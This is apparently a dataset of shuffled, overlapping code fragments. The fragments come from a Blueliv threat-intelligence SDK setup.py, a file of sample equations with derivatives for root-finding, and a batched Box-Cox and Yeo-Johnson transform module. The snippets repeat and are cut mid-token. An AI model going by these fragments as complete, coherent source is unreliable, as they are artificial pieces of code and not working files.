install_requires=['requests>=2.4.0,", "'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming", "MIT License', 'Programming Language :: Python :: 2', 'Programming Language :: Python ::", "'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', ],", ":: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language ::", "Approved :: MIT License', 'Programming Language :: Python :: 2', 'Programming Language ::", "OSI Approved :: MIT License', 'Programming Language :: Python :: 2', 'Programming Language", "'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'Topic :: Software", ":: Developers', 'Topic :: Software Development :: Build Tools', 'License :: OSI Approved", "Build Tools', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python", "Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python", "3', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3',", ":: Python :: 3.4', ], keywords='blueliv api crime servers bot ips security', packages=find_packages(exclude=['contrib',", "'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming", "Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language", ":: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python ::", "API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5", "author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers',", "Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python", "Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'Topic :: Software Development", "'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming", "Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python", "License', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.6',", "Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language", "license='MIT', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'Topic", "Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language", "Language :: Python :: 3.4', ], keywords='blueliv api crime servers bot ips security',", "crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']), install_requires=['requests>=2.4.0, <= 2.5.1', 'python-dateutil>=2.4.0'], test_requires=['mock']", "version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status", ":: Build Tools', 'License :: OSI Approved :: MIT License', 'Programming Language ::", "Software Development :: Build Tools', 'License :: OSI Approved :: MIT License', 'Programming", "'Intended Audience :: Developers', 'Topic :: Software Development :: Build Tools', 'License ::", ":: Software Development :: Build Tools', 'License :: OSI Approved :: MIT License',", ":: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language ::", "servers bot ips security', packages=find_packages(exclude=['contrib', 'docs', 'tests*']), install_requires=['requests>=2.4.0, <= 2.5.1', 'python-dateutil>=2.4.0'], test_requires=['mock'] )", "SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5 -", "Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', ], keywords='blueliv", "Python :: 3.4', ], keywords='blueliv api crime servers bot ips security', packages=find_packages(exclude=['contrib', 'docs',", "import setup, find_packages setup( name='blueliv-python-sdk', version='2.3.0', description='Blueliv API SDK for Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv',", ":: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python ::", "Python', url='https://github.com/Blueliv/api-python-sdk', author='Blueliv', author_email='<EMAIL>', license='MIT', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended" ]
[ "# Equation 2 def eq2(x): return (pow(x, 2) - 4) def eq2_d(x): return", "Sample Equations # # Description: Sample functions (and their derivatives) # to be", "Equations # # Description: Sample functions (and their derivatives) # to be used", "5*x + 1 def eq1_d(x): return 5*(x**4) - 5 # Equation 2 def", "(and their derivatives) # to be used with the root-finding algorithms. # #Equation", "eq1(x): return x**5 - 5*x + 1 def eq1_d(x): return 5*(x**4) - 5", "def eq1(x): return x**5 - 5*x + 1 def eq1_d(x): return 5*(x**4) -", "the root-finding algorithms. # #Equation 1 def eq1(x): return x**5 - 5*x +", "be used with the root-finding algorithms. # #Equation 1 def eq1(x): return x**5", "- 5*x + 1 def eq1_d(x): return 5*(x**4) - 5 # Equation 2", "- 5 # Equation 2 def eq2(x): return (pow(x, 2) - 4) def", "5 # Equation 2 def eq2(x): return (pow(x, 2) - 4) def eq2_d(x):", "5*(x**4) - 5 # Equation 2 def eq2(x): return (pow(x, 2) - 4)", "# Description: Sample functions (and their derivatives) # to be used with the", "Equation 2 def eq2(x): return (pow(x, 2) - 4) def eq2_d(x): return 2*x", "with the root-finding algorithms. # #Equation 1 def eq1(x): return x**5 - 5*x", "their derivatives) # to be used with the root-finding algorithms. # #Equation 1", "x**5 - 5*x + 1 def eq1_d(x): return 5*(x**4) - 5 # Equation", "return x**5 - 5*x + 1 def eq1_d(x): return 5*(x**4) - 5 #", "+ 1 def eq1_d(x): return 5*(x**4) - 5 # Equation 2 def eq2(x):", "to be used with the root-finding algorithms. # #Equation 1 def eq1(x): return", "# # Description: Sample functions (and their derivatives) # to be used with", "return 5*(x**4) - 5 # Equation 2 def eq2(x): return (pow(x, 2) -", "def eq1_d(x): return 5*(x**4) - 5 # Equation 2 def eq2(x): return (pow(x,", "used with the root-finding algorithms. # #Equation 1 def eq1(x): return x**5 -", "functions (and their derivatives) # to be used with the root-finding algorithms. #", "# to be used with the root-finding algorithms. # #Equation 1 def eq1(x):", "derivatives) # to be used with the root-finding algorithms. # #Equation 1 def", "# Sample Equations # # Description: Sample functions (and their derivatives) # to", "# #Equation 1 def eq1(x): return x**5 - 5*x + 1 def eq1_d(x):", "root-finding algorithms. # #Equation 1 def eq1(x): return x**5 - 5*x + 1", "1 def eq1(x): return x**5 - 5*x + 1 def eq1_d(x): return 5*(x**4)", "Description: Sample functions (and their derivatives) # to be used with the root-finding", "eq1_d(x): return 5*(x**4) - 5 # Equation 2 def eq2(x): return (pow(x, 2)", "algorithms. # #Equation 1 def eq1(x): return x**5 - 5*x + 1 def", "#Equation 1 def eq1(x): return x**5 - 5*x + 1 def eq1_d(x): return", "Sample functions (and their derivatives) # to be used with the root-finding algorithms.", "1 def eq1_d(x): return 5*(x**4) - 5 # Equation 2 def eq2(x): return" ]
[ "y.ndim - 1 y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2", "xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1) ks_mask = ks < best_ks", "ret[zero_mask] = xp.exp(y_in[zero_mask]) - lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) **", "= xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size) for lam in xp.around(xp.arange(*lam_range), 6): if yj:", "ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask &", "inv transform.\"\"\" ks = fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None]) return", "the the most normally distributed result.\"\"\" # TODO currently this just minimizes the", "1.0 - xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) ==", "distribution CDF, batched.\"\"\" t = x - mu[:, None] y = 0.5 *", "* y_in[~pos_mask] + 1.0) ** (1.0 / (2.0 - lam1[~pos_mask]))) + 1.0 ret[(~pos_mask)", "& zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0 ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0)", "lam): \"\"\"Inverse Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1", "@sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in =", "- 1.0 ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0) ** (1.0", "(sigma[:, None] * xp.sqrt(2.0))) # pylint: disable=no-member y[y > 1.0] = 1.0 return", "axis is None: # a = xp.ravel(a) # axis = 0 axis =", "inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched in the first dimension.\"\"\" y_in =", "_ = boxcox(y_in, lam) ys = xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1) /", "None self.lam2 = None def fit(self, y): \"\"\"Fit the batched 1d variables in", "in the first dimension.\"\"\" y_in = y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1),", "\"\"\"Init lambda storage.\"\"\" self.lam1 = None def fit(self, y): \"\"\"Fit the batched 1d", "return ret def inv(self, y): \"\"\"Inverse tranform using the fitted lambda values.\"\"\" return", "Box-Cox transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2", "= xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) /", "lam2): \"\"\"Inverse Box-Cox tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) ret", "xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask]", "__init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2 = None def", "+ lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) / lam1[~zero_mask] return ret, lam1, lam2 @sync_numerical_libs", "be better organized... @sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in the first", "- lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask])", "pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask]", "best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class", "ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] +", "zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1,", "xp.around(xp.arange(*lam_range), 6): if yj: yp, _ = yeojohnson(y, lam) else: yp, _, _", "> 1.0] = 1.0 return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)):", "((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0)", "axis = 0 axis = y.ndim - 1 y_in = y.astype(xp.float64) lam1 =", "result.\"\"\" # TODO currently this just minimizes the KS-stat, # would might better", "y_in[(~pos_mask) & two_mask]) return ret, lam1[:, 0][..., None] @sync_numerical_libs def inv_yeojohnson(y, lam): \"\"\"Inverse", "(lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask] return ret", "transform.\"\"\" ks = fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None]) return ret", "y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0) ret[(~pos_mask) &", "grid search, taking the the most normally distributed result.\"\"\" # TODO currently this", "y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2 is None: lam2", "might better to used shapiro-wilk or 'normaltest' but we'd need a batched version", "if yj: yp, _ = yeojohnson(y, lam) else: yp, _, _ = boxcox(y_in,", "y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of a power", "self.lam1 = yeojohnson(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform using", "= yeojohnson(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform using the", "disable=unused-variable from ..numerical_libs import sync_numerical_libs, xp # TODO this could be better organized...", "4) == 2.0 pos_mask = y_in >= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape)", "/ lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0", "* y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask]", "# TODO currently this just minimizes the KS-stat, # would might better to", "transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None def fit(self,", "the inv transform.\"\"\" ks = fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None])", "y_in = y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask]", "is None: lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape) zero_mask", "dimension.\"\"\" y_in = y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0", "lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=False) ret, self.lam1, self.lam2 =", "inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64)", "return inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\" def", "= xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape)", "TODO currently this just minimizes the KS-stat, # would might better to used", "0][..., None] @sync_numerical_libs def inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson tranform, batched in the first", "= fit_lam(y, yj=False) ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None]) return ret def", "yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1", "1 y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2 is None:", "y_in >= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape)", "y[y > 1.0] = 1.0 return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2,", "most normally distributed result.\"\"\" # TODO currently this just minimizes the KS-stat, #", "dimension.\"\"\" # TODO add axis param # if axis is None: # a", "a batched version y_in = xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks = xp.full(batch_size, xp.inf)", "): \"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2 = None def fit(self, y):", "batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64)", "** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask] return ret def norm_cdf(x, mu, sigma): \"\"\"Normal", "= yeojohnson(y, lam) else: yp, _, _ = boxcox(y_in, lam) ys = xp.sort(yp,", "tranform using the fitted lambda values.\"\"\" return inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper", "self.lam1, self.lam2 = boxcox(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform", "- y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0) ret[(~pos_mask)", "xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks = xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size) for lam", "y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask] =", "ks_mask = ks < best_ks best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks,", "mu[:, None] y = 0.5 * xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0))) #", "4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask])", "(y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 two_mask =", "return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of a", "shapiro-wilk or 'normaltest' but we'd need a batched version y_in = xp.atleast_2d(y) batch_size", "def inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in =", "@sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of a power transform", "= y_in.shape[0] best_ks = xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size) for lam in xp.around(xp.arange(*lam_range),", "zero_mask]) - 1.0 ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0) **", "1d variables in y, store the lambdas for the inv transform.\"\"\" ks =", "pylint: disable=unused-variable from ..numerical_libs import sync_numerical_libs, xp # TODO this could be better", "= xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2 is None: lam2 = 1.0 - xp.min(y_in,", "lam2 is None: lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape)", "ret def inv(self, y): \"\"\"Inverse tranform using the fitted lambda values.\"\"\" return inv_boxcox(y,", "/ lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0) ret[~pos_mask] =", "fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None]) return ret def inv(self, y):", "xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask]", "y_in[~pos_mask] + 1.0) ** (1.0 / (2.0 - lam1[~pos_mask]))) + 1.0 ret[(~pos_mask) &", "- y_in[(~pos_mask) & two_mask]) return ret, lam1[:, 0][..., None] @sync_numerical_libs def inv_yeojohnson(y, lam):", "): \"\"\"Init lambda storage.\"\"\" self.lam1 = None def fit(self, y): \"\"\"Fit the batched", "lam) ys = xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True)", "lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64)", "first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape)", "None] * xp.sqrt(2.0))) # pylint: disable=no-member y[y > 1.0] = 1.0 return y", "ks < best_ks best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam) class", "lambda storage.\"\"\" self.lam1 = None def fit(self, y): \"\"\"Fit the batched 1d variables", "lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0 ret[~pos_mask]", "None: # a = xp.ravel(a) # axis = 0 axis = y.ndim -", "we'd need a batched version y_in = xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks =", "values.\"\"\" return inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\"", "using grid search, taking the the most normally distributed result.\"\"\" # TODO currently", "lam): \"\"\"Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 =", "but we'd need a batched version y_in = xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks", "None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask]", "two_mask] = -xp.log(1.0 - y_in[(~pos_mask) & two_mask]) return ret, lam1[:, 0][..., None] @sync_numerical_libs", "xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask]", "4) == 0.0 ret[zero_mask] = xp.exp(y_in[zero_mask]) - lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask]", "= xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.exp(y_in[zero_mask]) - lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask]", "x - mu[:, None] y = 0.5 * xp.special.erfc(-t / (sigma[:, None] *", "1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask] return ret def norm_cdf(x, mu, sigma):", "y_in.shape[0] best_ks = xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size) for lam in xp.around(xp.arange(*lam_range), 6):", "inv(self, y): \"\"\"Inverse tranform using the fitted lambda values.\"\"\" return inv_boxcox(y, self.lam1, self.lam2)", "fitted lambda values.\"\"\" return inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper class for a", "store the lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=True) ret, self.lam1", "lam in xp.around(xp.arange(*lam_range), 6): if yj: yp, _ = yeojohnson(y, lam) else: yp,", "TODO this could be better organized... @sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched", "1.0) / lam1[~zero_mask] return ret, lam1, lam2 @sync_numerical_libs def inv_boxcox(y, lam1, lam2): \"\"\"Inverse", "& two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0 return ret @sync_numerical_libs def boxcox(y,", "-xp.log(1.0 - y_in[(~pos_mask) & two_mask]) return ret, lam1[:, 0][..., None] @sync_numerical_libs def inv_yeojohnson(y,", "/ (lam1[~pos_mask] - 2.0) ret[(~pos_mask) & two_mask] = -xp.log(1.0 - y_in[(~pos_mask) & two_mask])", "+ 1.0) ** (1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask", "xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 two_mask = xp.around(xp.ravel(lam1), 4) == 2.0", "= xp.exp(y_in[pos_mask & zero_mask]) - 1.0 ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask]", "best_ks best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper", "the inv transform.\"\"\" ks = fit_lam(y, yj=False) ret, self.lam1, self.lam2 = boxcox(y, ks[1][:,", "xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size) for lam in xp.around(xp.arange(*lam_range), 6): if yj: yp,", "+ 1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask", "transformation classes.\"\"\" # pylint: disable=unused-variable from ..numerical_libs import sync_numerical_libs, xp # TODO this", "lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask]) -", "ret, self.lam1 = yeojohnson(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform", "yeojohnson(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform using the fitted", "= xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] + 1.0)", "= x - mu[:, None] y = 0.5 * xp.special.erfc(-t / (sigma[:, None]", "ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) - 1.0", "xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.exp(y_in[zero_mask]) - lam2[zero_mask] ret[~zero_mask]", "y, store the lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=True) ret,", "1.0) ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) /", "pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask]", "return ret @sync_numerical_libs def boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched in the first", "& two_mask]) + 1.0 return ret @sync_numerical_libs def boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform,", "((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) / lam1[~zero_mask] return ret, lam1, lam2", "the lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=False) ret, self.lam1, self.lam2", "= 1.0 - xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4)", "lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0) ret[(~pos_mask) & two_mask] = -xp.log(1.0 -", "a Box-Cox transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None", "ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform using the fitted lambda", "ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask] -", "= y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2 is None: lam2 =", "the fitted lambda values.\"\"\" return inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper class for", "the first dimension.\"\"\" # TODO add axis param # if axis is None:", "xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2 is None: lam2 = 1.0 - xp.min(y_in, axis=axis,", "norm_cdf(x, mu, sigma): \"\"\"Normal distribution CDF, batched.\"\"\" t = x - mu[:, None]", "best_ks_lam = xp.empty(batch_size) for lam in xp.around(xp.arange(*lam_range), 6): if yj: yp, _ =", "y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2 is None: lam2 = 1.0", "xp.around(xp.ravel(lam1), 4) == 0.0 two_mask = xp.around(xp.ravel(lam1), 4) == 2.0 pos_mask = y_in", "lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) / lam1[~zero_mask] return ret, lam1, lam2 @sync_numerical_libs def", "# axis = 0 axis = y.ndim - 1 y_in = y.astype(xp.float64) lam1", "ret, lam1[:, 0][..., None] @sync_numerical_libs def inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson tranform, batched in", "-xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0 return ret @sync_numerical_libs def boxcox(y, lam, lam2=None): \"\"\"Box-Cox", "\"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\"", "None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] =", "xp.log(y_in[pos_mask & zero_mask] + 1.0) ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) ** (2.0 -", "xp.sqrt(2.0))) # pylint: disable=no-member y[y > 1.0] = 1.0 return y @sync_numerical_libs def", "xp.exp(y_in[zero_mask]) - lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0 /", "-(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0) ** (1.0 / (2.0 - lam1[~pos_mask])))", "2.0) ret[(~pos_mask) & two_mask] = -xp.log(1.0 - y_in[(~pos_mask) & two_mask]) return ret, lam1[:,", "None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] + 1.0)", "+ 1.0 ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0 return ret", "= 1.0 return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda", "# pylint: disable=unused-variable from ..numerical_libs import sync_numerical_libs, xp # TODO this could be", "2.0) * y_in[~pos_mask] + 1.0) ** (1.0 / (2.0 - lam1[~pos_mask]))) + 1.0", "= xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks = xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size) for", "the lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=True) ret, self.lam1 =", "better organized... @sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in the first dimension.\"\"\"", "- 1.0 ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0 ret[~pos_mask] =", "= xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0)", "zero_mask] = xp.log(y_in[pos_mask & 